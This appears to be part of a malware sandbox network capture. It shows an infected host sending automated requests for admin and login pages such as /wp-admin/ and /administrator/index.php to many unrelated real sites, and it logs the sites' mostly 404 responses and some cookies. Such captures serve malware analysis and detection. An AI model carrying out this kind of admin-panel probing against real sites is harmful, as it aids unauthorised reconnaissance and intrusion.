                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <link rel="SHORTCUT ICON" type="image/x-icon" href="/favicon.ico"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/ultra.css?v=3900.84.0-rel.31+aedff82" id="css_0"> <link rel="stylesheet" type="text/css" href="/ui-ultra/css/multi_fa
2024-02-05 11:16:08 UTC | 16384 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 402fuarram,afar,Rab\'al-Awwal,Rab\'ath-Thn,Jumd\'al-l,Jumd\'ath-Thniya,Rajab,Shabn,Raman,Shawwl,Dh\'al-Qada,Dh\'al-ijja'; LOCALE_SETTINGS['LOCALE_SETTINGS.GREETING'] = 'Bienvenido, {1}'; LOCALE
2024-02-05 11:16:08 UTC | 16384 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ; deleteCookie("JSESSIONID", "/deployment", nu3fb1ll, true); deleteCookie("JSESSIONID", "/content_area", null, true); deleteCookie("JSESSIONID", "/portfolio", null, true); deleteCookie("JSESSIONID", "/evidence_area", null,
2024-02-05 11:16:08 UTC | 12579 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ion-title" > <div class="mfa-modal-title"> <h1 id="mfa-verification-title" >Autenticacin de mltiples factores</h1> </div> <div class="verification-modal-body"> <div class="verification-modal-body-description"> <label f


Session ID | Source IP | Source Port | Destination IP | Destination Port
125 | 192.168.2.6 | 63976 | 54.183.63.241 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 223 | OUT | GET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: osCsid=a1aabfac7a1f7e8705602ed881881037
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 384 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: cE3wuo3TA1SD1
2024-02-05 11:16:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
126 | 192.168.2.6 | 63427 | 170.114.52.4 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 383 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://us04web.zoom.us/wp-login.php
2024-02-05 11:16:10 UTC | 1350 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=us04;rid=WEB_c5bf5ac2aebc8892112b64213b1f192d
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-smzSSlJ9TB-BNoLtyBrhWQ' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly


Session ID | Source IP | Source Port | Destination IP | Destination Port
127 | 192.168.2.6 | 63978 | 164.100.128.15 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 176 | OUT | GET /wp-admin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: upsconline.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 252 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 954
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
128 | 192.168.2.6 | 62986 | 3.134.125.175 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 202 | OUT | GET /administrator/index.php HTTP/1.1
Host: 3fba-180-252-166-236.ngrok.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 249 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Ngrok-Error-Code: ERR_NGROK_3200
Ngrok-Trace-Id: c2e440e820bef3ad20b52a5585ed00ed
Referrer-Policy: no-referrer
Date: Mon, 05 Feb 2024 11:16:10 GMT
Transfer-Encoding: chunked
2024-02-05 11:16:10 UTC | 937 | IN | Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
2024-02-05 11:16:10 UTC | 1498 | IN | Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


Session ID | Source IP | Source Port | Destination IP | Destination Port
129 | 192.168.2.6 | 63410 | 3.141.96.53 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 186 | OUT | GET /administrator/index.php HTTP/1.1
Host: money-farm.cc
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 113 | IN | HTTP/1.1 439 <none>
date: Mon, 05 Feb 2024 11:16:10 GMT
content-length: 0
server: NginX
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
130 | 192.168.2.6 | 63700 | 188.212.100.154 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 184 | OUT | GET /administrator/index.php HTTP/1.1
Host: zarkana2.ro
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 415 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Mon, 05 Feb 2024 11:17:36 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-02-05 11:16:10 UTC | 796 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


Session ID | Source IP | Source Port | Destination IP | Destination Port
131 | 192.168.2.6 | 63977 | 195.85.23.95 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 452 | OUT | GET /admin HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: bonga20120608=d4b62ea767f8c27a8f51fe1000153277; ts_type2=1; __cf_bm=sPKSaJvRUxAcg1PEcdR35O5GebQF9IpP_4Igj06Qn1U-1707131767-1-AfutacbLjRJXJ/HlVv4ccDZ2KwcLDrWfFrasoUlTJQoQXwrk+mYT9PLaGfsipxqCCZnwBC6f5dRn/AaHcx7pL3Q=; uh=IHSAIQqQLaWbpmumq0cKLxuvMUS0Hj==; fv=AmL3ZGZkAmN3ZD==
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 758 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
referrer-policy: origin-when-cross-origin
x-ua-compatible: IE=edge,chrome=1
set-cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
set-cookie: reg_ver2=3; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
cache-control: no-cache, no-store, must-revalidate
x-zone: 3-ded7546-web23
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 850abd5bfd2c7bca-ATL
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
132 | 192.168.2.6 | 63497 | 138.197.59.199 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 182 | OUT | GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 585 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: JSP/2.2
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=w0MJPTHCHLZiEcNbGbud2a8h.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex,noarchive
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-CL
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port
133 | 192.168.2.6 | 64608 | 3.161.150.69 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 181 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 2028 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=efa84f3d83ca000a&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgcLIf0TMqzdZ8YCpErSRx-VJ_NHvJY3I5Gv8mJys8gdUXLaeE-pi64g
                                                                                                                                                                                                                                                                                                                                                                content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=efa84f3d83ca000a&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgcLIf0TMqzdZ8YCpErSRx-VJ_NHvJY3I5Gv8mJys8gdUXLaeE-pi64g; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-G7uy4pm4OGXJyfV' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=86400; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 cc32f91d3d591d364f0c4e44eaf6525e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: uFTx0EgRNNejU_cEiOeYjjvxbjwDYmshtbmPo_p877ZYL7_CKRSNgg==
2024-02-05 11:16:10 UTC | 16384 | IN | Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
2024-02-05 11:16:10 UTC | 5568 | IN | Data Ascii: ry_code":"ss","prefix":"+211"},{"prefix":"+239","name":"S\u00e3o Tom\u00e9 and Pr\u00edncipe","country_code":"st"},{"prefix":"+503","name":"El Salvador","country_code":"sv"},{"name":"St. Maarten","country_code":"sx","prefix":"+1 721"},{"prefix":"+963","co
2024-02-05 11:16:10 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
134 | 192.168.2.6 | 63188 | 3.161.136.2 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 179 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 699 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 64
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/en/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                X-Gateway: traefik
                                                                                                                                                                                                                                                                                                                                                                X-Trace-Id: 11da1a8ec2944ef89177eca886e85da3
                                                                                                                                                                                                                                                                                                                                                                X-Traefik-Duration: 0.00
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 571e3220ab398deac626300fc9ad3bb0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: RFNQj2JANRgzMcISWC6ARI9M3fvb9wh-9VYMNbWxEo5-tHnUV4B4aQ==
2024-02-05 11:16:10 UTC | 64 | IN | Data Ascii: <a href="https://accounts.binance.com/en/wp-admin/">Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port
135 | 192.168.2.6 | 63477 | 34.149.46.130 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 180 | OUT | GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 5747 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=b740351c-8fe3-4e92-abf0-9c45e891561b; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
x-cloud-trace-context: 2b568c22a9606bb828f4d6ff1c0c4f83
date: Mon, 05 Feb 2024 11:16:10 GMT
server: API Gateway
Content-Length: 664
via: 1.1 google, 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
strict-transport-security: max-age=31536000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:16:10 UTC | 664 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


Session ID | Source IP | Source Port | Destination IP | Destination Port
136 | 192.168.2.6 | 62966 | 142.250.105.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 192 | OUT | GET /administrator/index.php HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 842 | IN | HTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:16:10 UTC | 1252 | IN | Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VKF3cm76RKe0QKIFm_Fp9A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:10 UTC | 397 | IN | Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


